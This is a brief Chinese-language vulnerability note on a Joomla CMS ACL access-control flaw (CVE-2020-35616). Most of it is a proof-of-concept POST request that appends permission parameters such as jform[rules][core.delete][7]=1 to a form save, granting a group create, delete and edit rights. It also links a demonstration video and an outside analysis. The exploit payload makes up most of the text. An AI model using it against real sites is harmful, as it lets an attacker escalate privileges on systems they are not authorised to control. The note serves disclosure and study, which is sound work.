# Joomla CMS 框架 ACL 安全访问控制漏洞（CVE-2020-35616）

POST请求表单中的ACL规则集的格式： jform[rules][core.PERMISSION][GROUP_ID]

```
jform[rules][core.delete][ID]
jform[rules][core.edit][ID]
jform[rules][core.edit.state][ID]
jform[rules][core.edit.own][ID]
```

如果将这些POST请求参数设置为值1，则基本上将这些特定权限设置为Allowed

**PoC:**

```
POST administrator/index.php?option={Target Category}
...
...
...
&jform[rules][core.{create|delete|edit}][AttackerID]=1
```

如上所述，我们希望向组ID为7的管理员授予所有权限。因此，在保存表单时，我们需要附加以下POST数据：

```
&jform[rules][core.create][7]=1&jform[rules][core.delete][7]=1&jform[rules][core.edit][7]=1&jform[rules][core.edit.state][7]=1&jform[rules][core.edit.own][7]=1
```

![](media/16096789927812/16096790331190.jpg)


PoC验证视频：
https://youtu.be/AZr6WydbUA0

详细分析文章见：https://blog.securelayer7.net/latest-joomla-exploit-cve-2020-35616-acl-security-vulnerabilities/